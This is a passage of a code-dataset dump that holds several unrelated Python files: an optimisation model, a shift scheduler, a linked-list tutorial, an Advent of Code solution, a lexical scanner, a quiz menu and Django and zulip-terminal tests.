m1.addConstr(sum(y1[i, k] for i in pod_sites) == 
1)\n\n# the total money used is at most the maximum budget\nm1.addConstr(sum(cost.iloc[i]*x1[i] for i in pod_sites) <= budget)\n\n\nm1.optimize()\n\n\n\n####### MODEL 2\nm2 = gp.Model()\n\n# Decision variables\nx2 = m2.addVars(pod_sites, vtype=GRB.BINARY)\ny2 = m2.addVars(pod_sites, blocks, vtype=GRB.BINARY)\nM = m2.addVar(lb=0.0, obj=1.0, vtype=GRB.CONTINUOUS)\n\n# Objective function\nm2.modelSense = GRB.MINIMIZE\nm2.setObjective(M)\n\n# Constraints\n\n## maximum distance traveled for anyone is M\nfor i in pod_sites:\n for k in blocks:\n m2.addConstr((y2[i, k]*distance.iloc[k, i]) <= M)\n\n## all pod sites are bounded by a given capacity\nfor i in pod_sites:\n m2.addConstr(sum(y2[i, k]*population.iloc[k] for k in blocks) <= capacity.iloc[i]*x2[i])\n\n## each block is assigned to exactly 1 pod site\nfor k in blocks:\n m2.addConstr(sum(y2[i, k] for i in pod_sites) == 1)\n\n# the total money used is at most the maximum budget\nm2.addConstr(sum(cost.iloc[i]*x2[i] for i in pod_sites) <= budget)\n\n\nm2.optimize()\n\n","sub_path":"V1_DABP_Code/DABP_Final_Project.py","file_name":"DABP_Final_Project.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"277705020","text":"\r\n\"\"\"\r\nWritten by Abhinandan Das\r\nFind the specifications on how to use the program in the Wiki section of the Repository\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport random\r\nimport calendar\r\nr = input(\"\\nInput Month number: \")\r\nr = int(r)\r\nq = input(\"Input the year: \")\r\nq = int(q)\r\n# backslash = \"\\\\\\\\\\\\\"\r\npathin = input(\"Input location (*.csv): \")\r\npathout = input(\"Output Location (*.xlsx): \")\r\n# pathin, pathout = str(pathin), str(pathout)\r\npathin = str(pathin)\r\npathout = str(pathout)\r\n\r\nemployees_df = pd.read_csv(pathin)\r\nemployees_names = [employees_df.columns[i+1] for i in range( 0,len(employees_df.columns)-1 )]\r\nnow = calendar.datetime.datetime.now()\r\npresentdate = str(now.year) + '-' + str(now.month) + '-' + str(now.day)\r\nc = calendar.TextCalendar()\r\n\r\n# q = now.year\r\n# r = now.month\r\nz = []\r\n\r\n\r\nfor i in c.itermonthdays2(q, r):\r\n z.append(list(i))\r\nmonth_names = {\r\n 1:'January',\r\n 2: 'February',\r\n 3:'March',\r\n 4:'April',\r\n 5:'May',\r\n 6:'June',\r\n 7:'July',\r\n 8:'August',\r\n 9:'September',\r\n 10:'October',\r\n 11:'November',\r\n 12:'December'\r\n}\r\nSHEET_NAME = 'Dispatcher Slot for' + ' ' + month_names[r]\r\npurge_days = ([[0,i] for i in range(0,7)] + \r\n [[a,b] for a in range(0,32) for b in range(5,7)] + \r\n [[25,j] for j in range(0,7) if r == 12] + \r\n [[1,k] for k in range(0,7) if r == 1] +\r\n [[1,l] for l in range(0,7) if r == 5])\r\n# purge_days\r\nz = [i for i in z if i not in purge_days]\r\nworkdates = []\r\nfor i in range(0, len(z)):\r\n workdates = workdates + [\r\n str(q) + '-' + str(r) + '-' + \r\n str(z[i][0])]\r\npurge_days = []\r\n# with open('D:\\\\Users\\\\abhindas\\\\Desktop\\\\dispatcher\\\\global_holidays.csv','r') as file:\r\n# for line in file:\r\n# purge_days = purge_days + [line.rstrip('\\n')]\r\nworkdates = [i for i in workdates if i not in purge_days]\r\nrandom.shuffle(employees_names)\r\nnew_emp_df = employees_df[employees_df.Date.isin(workdates)]\r\nslot_1, slot_2, slot_3, slot_4 = [], [], [], []\r\nd, i = 0,0\r\nfor date in workdates:\r\n v_df = new_emp_df[new_emp_df.Date == date]\r\n random.shuffle\r\nslot = pd.Series(slot_1)\r\n# print(slot)\r\ndef countstr(str):\r\n return(slot_1.count(str) + 
slot_2.count(str) + slot_3.count(str) + slot_4.count(str)) \r\n\r\nfor date in workdates:\r\n v_df = new_emp_df[new_emp_df.Date == date]\r\n available_names = [v_df.columns[i+1] for i in range( 0,len(v_df.columns)-1 ) if pd.Series.tolist(v_df[v_df.columns[i+1]])[0] == 'INDIA' ]\r\n random.shuffle(available_names)\r\n\r\n temp = random.sample(available_names,3)\r\n slot_1.append(temp[0])\r\n slot_2.append(temp[1])\r\n slot_3.append(temp[2])\r\n \r\n available_names1 = [v_df.columns[i+1] for i in range( 0,len(v_df.columns)-1 ) if pd.Series.tolist(v_df[v_df.columns[i+1]])[0] in ['US','UK'] ]\r\n random.shuffle(available_names1)\r\n temp1 = random.sample(available_names1,1)\r\n slot_4.append(temp1[0])\r\n\r\ndict1 = {'Date': workdates, '[10AM - 1PM]': slot_1,'[1PM - 4 PM]': slot_2,'[4PM - 7PM]': slot_3,'[7PM - 10PM]': slot_4}\r\ndict1_df = pd.DataFrame(dict1)\r\nprint(dict1_df)\r\n\r\nprint(\"\\n\")\r\n\r\n# dict1_df.to_excel('D:\\\\Users\\\\abhindas\\\\Desktop\\\\dispatcher\\\\Disptacher_13FEB.xlsx', index = None, header=True, sheet_name=SHEET_NAME)\r\ndict1_df.to_excel(pathout, index = None, header=True, sheet_name=SHEET_NAME)\r\n\r\nemployees_names.sort()\r\nfor i in employees_names:\r\n print(i + \" : count : \" + str(countstr(i)))\r\n\r\n\r\n","sub_path":"disp_auto.py","file_name":"disp_auto.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"596831404","text":"from src.model import evaluate_t_plus_5_performance, evaluate_t_plus_1_performance\nfrom src.model import ts_norm_to_scaled, ts_scaled_to_norm, features\nimport argparse\nfrom src.model import demand_lstm\nimport pandas as pd\n\n\nparser = argparse.ArgumentParser(description='Load trained model and evaluate')\nparser.add_argument('--model_path', metavar='MODEL_PATH', type=str,\n default='./models/best_lstm_model',\n help='Path of trained model. Default value corresponds to previously trained model')\nparser.add_argument('--transformed_test_df_path', metavar='TRANSFORMED_TEST_DF_PATH', type=str,\n default='NOPATH',\n help='Path of transformed test df. 
Test df initially needs to be passed in preprocess_dataset.py'\n )\n\nif __name__ == '__main__':\n print('Evaluating performance at t+1 only, followed by performance at t+1...t+5')\n demand_features = features['demand_features']\n ts_features = features['ts_features']\n target_features = features['target_features']\n\n step_back = len(demand_features)\n ts_shape = len(ts_features)\n y_shape = len(target_features)\n\n args = parser.parse_args()\n model_path = args.model_path\n transformed_test_df_path = args.transformed_test_df_path\n\n transformed_test_df = pd.read_parquet(transformed_test_df_path)\n\n model = demand_lstm(step_back, ts_shape, y_shape)\n model.load_weights(model_path)\n\n # evaluate performance at t + 1\n evaluate_t_plus_1_performance(transformed_test_df, model, demand_features, ts_features, target_features)\n\n # evalute performance at t + 5\n evaluate_t_plus_5_performance(transformed_test_df, model, ts_norm_to_scaled, ts_scaled_to_norm,\n demand_features, ts_features)\n print('Performance evaluation over.')\n","sub_path":"src/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"438330544","text":"# Reverse a Linked List in groups of given size \r\n# Given a linked list, write a function to reverse every k nodes (where k is an input to the function). \r\n\r\n# Example: \r\n\r\n# Input: 1->2->3->4->5->6->7->8->NULL, K = 3 \r\n# Output: 3->2->1->6->5->4->8->7->NULL \r\n# Input: 1->2->3->4->5->6->7->8->NULL, K = 5 \r\n# Output: 5->4->3->2->1->8->7->6->NULL \r\n\r\n# Algorithm: reverse(head, k) \r\n\r\n# Reverse the first sub-list of size k. While reversing keep track of the next node and previous node. Let the pointer to the next node be next and pointer to the previous node be prev. See this post for reversing a linked list.\r\n# head->next = reverse(next, k) ( Recursively call for rest of the list and link the two sub-lists )\r\n# Return prev ( prev becomes the new head of the list (see the diagrams of iterative method of this post) )\r\n\r\n# Python program to reverse a \r\n# linked list in group of given size\r\n\r\n# Node class\r\n\r\n\r\nclass Node:\r\n\r\n\t# Constructor to initialize the node object\r\n\tdef __init__(self, data):\r\n\t\tself.data = data\r\n\t\tself.next = None\r\n\r\n\r\nclass LinkedList:\r\n\r\n\t# Function to initialize head\r\n\tdef __init__(self):\r\n\t\tself.head = None\r\n\r\n\tdef reverse(self, head, k):\r\n\t\r\n\t\tif head == None:\r\n\t\t return None\r\n\t\tcurrent = head\r\n\t\tnext = None\r\n\t\tprev = None\r\n\t\tcount = 0\r\n\r\n\t\t# Reverse first k nodes of the linked list\r\n\t\twhile(current is not None and count < k):\r\n\t\t\tnext = current.next\r\n\t\t\tcurrent.next = prev\r\n\t\t\tprev = current\r\n\t\t\tcurrent = next\r\n\t\t\tcount += 1\r\n\r\n\t\t# next is now a pointer to (k+1)th node\r\n\t\t# recursively call for the list starting\r\n\t\t# from current. 
And make rest of the list as\r\n\t\t# next of first node\r\n\t\tif next is not None:\r\n\t\t\thead.next = self.reverse(next, k)\r\n\r\n\t\t# prev is new head of the input list\r\n\t\treturn prev\r\n\r\n\t# Function to insert a new node at the beginning\r\n\tdef push(self, new_data):\r\n\t\tnew_node = Node(new_data)\r\n\t\tnew_node.next = self.head\r\n\t\tself.head = new_node\r\n\r\n\t# Utility function to print the linked LinkedList\r\n\tdef printList(self):\r\n\t\ttemp = self.head\r\n\t\twhile(temp):\r\n\t\t\tprint (temp.data,end=\" \")\r\n\t\t\ttemp = temp.next\r\n\r\n\r\n# Driver program\r\nllist = LinkedList()\r\nllist.push(9)\r\nllist.push(8)\r\nllist.push(7)\r\nllist.push(6)\r\nllist.push(5)\r\nllist.push(4)\r\nllist.push(3)\r\nllist.push(2)\r\nllist.push(1)\r\n\r\nprint(\"Given linked list\")\r\nllist.printList()\r\nllist.head = llist.reverse(llist.head, 3)\r\n\r\nprint(\"\\nReversed Linked list\")\r\nllist.printList()\r\n\r\n# Complexity Analysis: \r\n\r\n# Time Complexity: O(n). \r\n# Traversal of list is done only once and it has ‘n’ elements.\r\n# Auxiliary Space: O(n/k). \r\n# For each Linked List of size n, n/k or (n/k)+1 calls will be made during the recursion.\r\n\r\n","sub_path":"geeksforgeeks/linkedlist/singly-linked-list/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"28330113","text":"#pass multiple parameters\ndef print_args(val, **kwargs):\n print (val)\n print (kwargs['name'])\n\nprint_args(\"hello\", name=\"luis\", lastname=\"Salazar\")\n\n#app\nstudents=[]\n\ndef get_students_titlecase():\n students_titlecase=[]\n for student in students:\n students_titlecase.append(student['name'].title())\n return students_titlecase\n\n\ndef print_studens_titlecase():\n students_titlecase= get_students_titlecase()\n print (students_titlecase)\n\n\ndef add_student(student_name, student_id=1):\n student={\n \"name\": student_name,\n \"id\": student_id\n }\n students.append(student)\n\n\ndef read_file():\n try:\n students_file= open(\"students.txt\", \"r\")\n\n for student in read_students(students_file):\n add_student(student)\n\n students_file.close()\n\n except Exception as ex:\n print(ex)\n\n#yield\ndef read_students(f):\n for line in f:\n yield line\n\ndef save_file(student):\n try:\n students_file = open(\"students.txt\", \"a\")\n students_file.write(student + \"\\n\")\n students_file.close()\n\n except Exception as ex:\n print(ex)\n\n\nread_file()\nprint_studens_titlecase()\n\nstudent_name= input(\"Student name: \")\nstudent_id= input(\"Student ID: \")\n\nadd_student(student_name, student_id)\nsave_file(student_name)\n","sub_path":"E08_yield.py","file_name":"E08_yield.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"510069565","text":"from collections import defaultdict\n\ndef getInput(inputFile):\n fields = []\n cond = []\n myTicket = []\n nearbyTickets = []\n for line in inputFile:\n if line == '\\n':\n break\n line = line.split(': ')\n fields.append(line[0])\n line = line[1]\n line = line.replace('\\n', '')\n line = line.split(' or ')\n temp = []\n for pos in line:\n pos = pos.split('-')\n for i in range(len(pos)):\n pos[i] = int(pos[i])\n temp.append(pos)\n cond.append(temp)\n inputFile.readline()\n myTicket = inputFile.readline().split(',')\n for i in range(len(myTicket)):\n myTicket[i] = int(myTicket[i])\n inputFile.readline()\n 
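# the readline() above and the one below skip the blank separator line and the 'nearby tickets:' header\n    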
inputFile.readline()\n    for line in inputFile:\n        line = line.split(',')\n        for i in range(len(line)):\n            line[i] = int(line[i])\n        nearbyTickets.append(line)\n    return fields, cond, myTicket, nearbyTickets\n\ndef assignNumbers(cond):\n    numbers = set()\n    for line in cond:\n        for interval in line:\n            for i in range(interval[0], interval[1]+1):\n                numbers.add(i)\n    return numbers\n\ndef task1(numbers, nearbyTickets):\n    i = 0\n    while i < len(nearbyTickets):\n        for num in nearbyTickets[i]:\n            if num not in numbers:\n                nearbyTickets.pop(i)\n                i-=1\n                break  # this row is gone; without the break a second bad value would pop the wrong ticket\n        i+=1\n    return nearbyTickets\n\n#------------------------------PART-2-----------------------------------\ndef makeTable(fields, cond):\n    table = defaultdict(set)\n    for i, field in enumerate(fields):\n        for j in range(len(cond[i])):\n            for k in range(cond[i][j][0], cond[i][j][1]+1):\n                table[field].add(k)\n    return table\n\ndef clearColumns(columns, fields, removedSet):\n    for i in range(len(fields)):\n        if len(columns[i]) == 1 and columns[i][0] not in removedSet:\n            removed = columns[i][0]\n            removedSet.add(removed)\n            break\n    \n    for i in range(len(fields)):\n        if len(columns[i]) > 1:\n            try:\n                columns[i].remove(removed)\n            except:\n                continue\n    \n    for i in range(len(fields)):\n        if len(columns[i]) > 1:\n            return clearColumns(columns, fields, removedSet)\n    return columns\n    \n\n\ndef task2(table, nearbyTickets, fields):\n    columns = defaultdict(list)\n    for i in range(len(nearbyTickets[0])):\n        for field in fields:\n            for ticket in nearbyTickets:\n                if ticket[i] not in table[field]:\n                    break\n            else:\n                columns[i].append(field)\n    \n    columns = clearColumns(columns, fields, set())\n\n    indexSet = set()\n    for i in range(len(columns)):\n        if 'departure' in columns[i][0]:\n            indexSet.add(i)\n    \n    res = 1\n    myTicket = nearbyTickets[-1]\n    for index in indexSet:\n        res *= myTicket[index]\n    return res\n#=========================================================================\ninputFile = open("input.txt", 'r')\nfields, cond, myTicket, nearbyTickets = getInput(inputFile)\ninputFile.close()\nnumbers = assignNumbers(cond)\n#print(numbers)\nnearbyTickets = task1(numbers, nearbyTickets)\nnearbyTickets.append(myTicket)\ntable = makeTable(fields, cond)\n#print(table)\n#print(cond)\n#print(nearbyTickets)\n#print(fields)\nprint(task2(table, nearbyTickets, fields))\n\n\n","sub_path":"day16/day16.2.py","file_name":"day16.2.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"593909245","text":"import pytest\n\nfrom zulipterminal.helper import (\n    index_messages,\n)\nfrom typing import Any\n\n\ndef test_index_messages_narrow_all_messages(mocker,\n                                            messages_successful_response,\n                                            index_all_messages,\n                                            initial_index) -> None:\n    messages = messages_successful_response['messages']\n    model = mocker.patch('zulipterminal.model.Model.__init__',\n                         return_value=None)\n    model.index = initial_index\n    model.narrow = []\n    assert index_messages(messages, model, model.index) == index_all_messages\n\n\ndef test_index_messages_narrow_stream(mocker,\n                                      messages_successful_response,\n                                      index_stream,\n                                      initial_index) -> None:\n    messages = messages_successful_response['messages']\n    model = mocker.patch('zulipterminal.model.Model.__init__',\n                         return_value=None)\n    model.index = initial_index\n    model.narrow = [['stream', 'PTEST']]\n    model.stream_id = 205\n    assert index_messages(messages, model, model.index) == index_stream\n\n\ndef test_index_messages_narrow_topic(mocker,\n                                     messages_successful_response,\n                                     index_topic,\n                                     initial_index) -> 
None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['stream', '7'],\n ['topic', 'Test']]\n model.stream_id = 205\n assert index_messages(messages, model, model.index) == index_topic\n\n\ndef test_index_messages_narrow_user(mocker,\n messages_successful_response,\n index_user,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['pm_with', 'boo@zulip.com']]\n model.user_id = 5140\n model.user_dict = {\n 'boo@zulip.com': {\n 'user_id': 5179,\n }\n }\n assert index_messages(messages, model, model.index) == index_user\n\n\ndef test_index_messages_narrow_user_multiple(mocker,\n messages_successful_response,\n index_user_multiple,\n initial_index) -> None:\n messages = messages_successful_response['messages']\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['pm_with', 'boo@zulip.com, bar@zulip.com']]\n model.user_id = 5140\n model.user_dict = {\n 'boo@zulip.com': {\n 'user_id': 5179,\n },\n 'bar@zulip.com': {\n 'user_id': 5180\n }\n }\n assert index_messages(messages, model, model.index) == index_user_multiple\n\n\n@pytest.mark.parametrize('msgs_with_stars', [\n {537286, 537287, 537288},\n {537286}, {537287}, {537288},\n {537286, 537287}, {537286, 537288}, {537287, 537288},\n])\ndef test_index_starred(mocker,\n messages_successful_response,\n empty_index,\n msgs_with_stars,\n initial_index):\n messages = messages_successful_response['messages']\n for msg in messages:\n if msg['id'] in msgs_with_stars and 'starred' not in msg['flags']:\n msg['flags'].append('starred')\n\n model = mocker.patch('zulipterminal.model.Model.__init__',\n return_value=None)\n model.index = initial_index\n model.narrow = [['is', 'starred']]\n\n expected_index = dict(empty_index, all_private={537287, 537288},\n all_starred=msgs_with_stars)\n for msg_id, msg in expected_index['messages'].items():\n if msg_id in msgs_with_stars and 'starred' not in msg['flags']:\n msg['flags'].append('starred')\n\n assert index_messages(messages, model, model.index) == expected_index\n","sub_path":"tests/helper/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"320663109","text":"import random\nimport math\nimport random as rm\nimport math as mt\nfrom random import choice\nimport time\nfrom typing import final\nimport pyfiglet\nimport colorama\nfrom colorama import Back, Fore, Style, init\nimport sys \n\n\n#MAGIC MATH GAME - titulo\n\ncolorama.init(autoreset=True)\n\nif 1 == 1:\n print(f\"\\n{Fore.RED}M{Fore.LIGHTRED_EX}A{Fore.YELLOW}G{Fore.LIGHTYELLOW_EX}I{Fore.LIGHTGREEN_EX}C {Fore.GREEN}M{Fore.LIGHTCYAN_EX}A{Fore.CYAN}T{Fore.LIGHTBLUE_EX}H {Fore.BLUE}G{Fore.LIGHTMAGENTA_EX}A{Fore.MAGENTA}M{Fore.MAGENTA}E\"'\\n')\n if 2==1:\n p = 3\n\n#Introduccion tiempo retraso\nvelocidad = float(input(f'{Fore.LIGHTYELLOW_EX}Ingresa la velocidad para las instrucciones: '))\ndef delay_print(s):\n for c in s:\n sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nnombre = input(f'{Fore.YELLOW}Ingresa tu nombre: ')\ndelay_print(f'¡Bienvenid@ {nombre}!\\n')\n#Intro\ndef delay_print(s):\n for c in s:\n 
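# emit one character at a time, sleeping between writes, so the text appears animated\n        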
sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nintro1 = str(f'\\nA continuación tendrás que poner a prueba tus conocimientos y habilidades, contestando problemas matemáticos de cuatro áreas.')\nintro2 = str(f'Los resultados se mostrarán una vez finalizado y respondido las cuatro áreas.')\ndelay_print(f'{intro1}\\n{intro2}')\n\n# Evalución \ndef delay_print(s):\n for c in s:\n sys.stdout.write(c)\n sys.stdout.flush()\n time.sleep(float(f'{velocidad}'))\n\nevalua1 = str(f'\\nCada ejercicio vale 2 puntos.')\nevalua2 = str(f'Necesitas el 70% para aprobar el área.\\n')\ndelay_print(f'{evalua1}\\n{evalua2}')\n\n# Codigo - Menu\n\nmenu = f\"\"\"\n{Fore.LIGHTCYAN_EX}Bienvenido 💙\n{Fore.YELLOW} 1 - Aritmética\n{Fore.MAGENTA} 2 - Álgebra\n{Fore.LIGHTGREEN_EX} 3 - Geometría\n{Fore.BLUE} 4 - Probabilidad y estadística\n{Fore.RED} 5 - Salir\n\n{Fore.RED}Elige una area: \n\"\"\"\nopcion = input(menu)\n\ndef area(area_elegida):\n if area_elegida == '1':\n print(f\"{Fore.YELLOW}Empecemos con Aritmética\")\n \n\n elif area_elegida == '2':\n print(f\"{Fore.MAGENTA}Empecemos con Álgebra\")\n \n\n elif area_elegida == '3':\n print(f\"{Fore.MAGENTA}Empecemos con Geometría\")\n \n\n elif area_elegida == '4':\n print(f\"{Fore.BLUE}Empecemos con Probabilidad y estadística\")\n \n\n elif area_elegida == '5':\n print(f\"{Fore.LIGHTYELLOW_EX}Adios, regresa para seguir aprendiendo\")\n\n else:\n print(f'{Fore.RED}Ingresa una opción correcta por favor, ¡Exito en tu prueba!😎')\n\narea = area(opcion)","sub_path":"proyecto-integrador/pisa.py","file_name":"pisa.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"537842969","text":"input_file = open(\"input.txt\", 'r')\ncode = input_file.read()\n\noutput_file = open(\"scanner.txt\", 'w+')\nfirst_output = True\n\nlexical_error_file = open(\"lexical_errors.txt\", 'w+')\nfirst_lexical_error = True\n\nstart_ind = 0\nend_ind = 0\nind = -1\ncurrent_char = ''\nnext_char = ''\nline_num = 1\nline_changed = True\nerror_line_changed = True\n\nTOKEN_INITIAL = 0\nTOKEN_NUM = 1\nTOKEN_KEYWORD = 2\nTOKEN_ID = 3\nTOKEN_SYMBOL = 4\nTOKEN_COMMENT = 5\nTOKEN_WHITESPACE = 6\nTOKEN_EOF = 7\nEOF = \"@EOF@\"\nstate = TOKEN_INITIAL\nsymbols = [';', ':', ',', '[', ']', '(', ')', '{', '}', '+', '-', '*', '=', '<', '==']\nwhitespace = ['\\n', '\\r', '\\t', ' ', '\\v', '\\f']\ndigit = [str(i) for i in range(10)]\nalphabet = [chr(i) for i in range(65, 91)] + [chr(i) for i in range(97, 123)]\nkeywords = ['if', 'else', 'void', 'int', 'while', 'break', 'continue', 'switch', 'default', 'case', 'return', 'int']\ncomments = ['/', '*']\nall_letters = symbols + whitespace + digit + alphabet + keywords + comments\n\n\ndef get_string():\n global start_ind, end_ind, code\n return code[start_ind:end_ind] # TODO- end_int + 1 ????\n\n\ndef get_char():\n global ind, code, current_char, next_char\n ind += 1\n if ind < len(code):\n current_char = code[ind]\n if ind + 1 < len(code):\n next_char = code[ind + 1]\n return current_char\n\n current_char = None\n return EOF\n\n\ndef num():\n global end_ind\n while current_char is not None:\n if current_char not in digit:\n if current_char in symbols or current_char in whitespace or current_char in all_letters:\n return True, get_string(), 'NUM'\n else:\n return False, get_string() + current_char, 'invalid input'\n get_char()\n end_ind = ind\n return True, get_string(), 'NUM'\n\n\ndef symbol():\n global end_ind\n if current_char == '=':\n if 
next_char == '=':\n            get_char()\n            end_ind = ind\n\n    get_char()\n    end_ind = ind\n    return True, get_string(), 'SYMBOL'\n\n\ndef skip_whitespace():\n    global line_num, line_changed, error_line_changed\n    global end_ind\n    while current_char in whitespace:\n        if current_char == '\\n':\n            line_num += 1\n            line_changed = True\n            error_line_changed = True\n        get_char()\n        end_ind = ind\n\n\ndef id():\n    global end_ind, ind\n    while current_char is not None:\n\n        if (current_char not in digit) and (current_char not in alphabet):\n            if current_char in symbols or current_char in whitespace:\n                if get_string() in keywords:\n                    return True, get_string(), 'KEYWORD'\n\n                return True, get_string(), 'ID'\n            else:\n                return False, get_string() + current_char, 'invalid input'\n        get_char()\n        end_ind = ind\n\n    return True, get_string(), 'ID'\n\n\ndef comment():\n    global end_ind\n    if next_char == '/':\n        get_char()\n        end_ind = ind\n        while current_char != '\\n' and current_char is not None:\n            get_char()\n            end_ind = ind\n\n        return True, None, 'COMMENT'\n    if next_char == '*':\n        get_char()\n        end_ind = ind\n\n        while current_char is not None and (current_char + next_char != '*/'):\n            get_char()\n            end_ind = ind\n\n        get_char()\n        get_char()\n        end_ind = ind\n\n        return True, None, 'COMMENT'\n\n    get_char()\n    return False, get_string() + current_char, 'invalid input'\n\n\ndef get_next_token():\n    global state, end_ind, start_ind\n    get_char()\n    is_token = False\n    token_string = token_type = ''\n    while current_char is not None:\n        skip_whitespace()\n        start_ind = ind\n        if current_char in digit:\n            state = TOKEN_NUM\n            is_token, token_string, token_type = num()\n\n        elif current_char in symbols:\n            state = TOKEN_SYMBOL\n            is_token, token_string, token_type = symbol()\n\n        elif current_char in alphabet:\n            is_token, token_string, token_type = id()\n\n        elif current_char == '/':\n            state = TOKEN_COMMENT\n            is_token, token_string, token_type = comment()\n\n        else:\n            is_token = False\n            token_type = 'invalid input'\n            token_string = current_char\n\n        if is_token and state != TOKEN_COMMENT:\n            print_token(token_type, token_string)\n        elif not is_token:\n            get_char()\n            print_error(token_type, token_string)\n\n        start_ind = ind\n        state = TOKEN_INITIAL\n\n\ndef print_token(token_type, token_string):\n    global output_file, line_changed, first_output\n    if line_changed and not first_output:\n        print()\n        output_file.write('\\n')\n    if line_changed:\n        print(str(line_num) + '. (' + token_type + ', ' + token_string + ')', end='')\n        output_file.write(str(line_num) + '. (' + token_type + ', ' + token_string + ')')\n        line_changed = False\n    else:\n        print(' (' + token_type + ', ' + token_string + ')', end='')\n        output_file.write(' (' + token_type + ', ' + token_string + ')')\n    first_output = False\n\n\ndef print_error(token_type, token_string):\n    global lexical_error_file, error_line_changed, first_lexical_error\n    if error_line_changed and not first_lexical_error:\n        print()\n        lexical_error_file.write('\\n')\n    if error_line_changed:\n        print(str(line_num) + '. (' + token_string + ', ' + token_type + ')', end='')\n        lexical_error_file.write(str(line_num) + '. 
(' + token_string + ', ' + token_type + ')')\n        error_line_changed = False\n    else:\n        print(' (' + token_string + ', ' + token_type + ')', end='')\n        lexical_error_file.write(' (' + token_string + ', ' + token_type + ')')\n    first_lexical_error = False\n\n\nget_next_token()\noutput_file.close()\nlexical_error_file.close()\ninput_file.close()\n","sub_path":"Compiler Design Project - Spring 2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"150510781","text":"\n\n#class header\nclass _MOTORWAY():\n\tdef __init__(self,): \n\t\tself.name = "MOTORWAY"\n\t\tself.definitions = [u'a wide road for fast-moving traffic, especially in the UK, Ireland, and some other countries, with a limited number of places at which drivers can enter and leave it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_motorway.py","file_name":"_motorway.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213340500","text":"from django.test import TestCase, RequestFactory\n\nfrom api.app.models.games import *\nfrom api.app.views.games import *\n\n\nclass GamesTest(TestCase):\n    \"\"\"\n    Test view functionality for basic game functions\n    \"\"\"\n\n    def setUp(self):\n        # Every test needs access to the request factory.\n        self.factory = RequestFactory()\n        self.user = User.objects.create_user(username='test_user', email='test@example.com', password='test_pass')\n        self.game = Game.objects.create(\n            name='Sample of Fun',\n            abbreviation='SoF',\n            description='This is a sample game!',\n            game_master=self.user\n        )\n\n    def test_get_list(self):\n        request = self.factory.get('/games/')\n        request.user = self.user\n        response = game_list(request)\n        self.assertEqual(response.status_code, 200)\n\n    def test_get_create(self):\n        request = self.factory.get('/games/new/')\n        request.user = self.user\n        response = game_create(request)\n        self.assertEqual(response.status_code, 200)\n\n    def test_post_create(self):\n        request = self.factory.post('/games/new/', {\n            'name': 'Test of Fun',\n            'abbreviation': 'ToF',\n            'description': 'This is a test game!'\n        }, follow=True)\n        request.user = self.user\n        response = game_create(request)\n        self.assertEqual(response.status_code, 302)\n        game = Game.objects.filter(name='Test of Fun')\n        self.assertIsNotNone(game)\n\n    def test_get_view(self):\n        request = self.factory.get('/games/view/')\n        request.user = self.user\n        response = game_view(request, self.game.id)\n        self.assertEqual(response.status_code, 200)\n\n    def test_get_update(self):\n        request = self.factory.get('/games/edit/')\n        request.user = self.user\n        response = game_update(request, self.game.id)\n        self.assertEqual(response.status_code, 200)\n\n    def test_post_update(self):\n        new_name = 'Sample of Fun 2'\n        request = self.factory.post('/games/edit/', {\n            'name': new_name,\n            'abbreviation': self.game.abbreviation,\n            'description': self.game.description\n        }, follow=True)\n        request.user = self.user\n        response = game_update(request, self.game.id)\n        self.assertEqual(response.status_code, 302)\n        self.game.refresh_from_db()\n        self.assertEqual(self.game.name, new_name)\n\n    def test_get_delete(self):\n        request = self.factory.get('/games/delete/')\n        request.user = self.user\n        response 
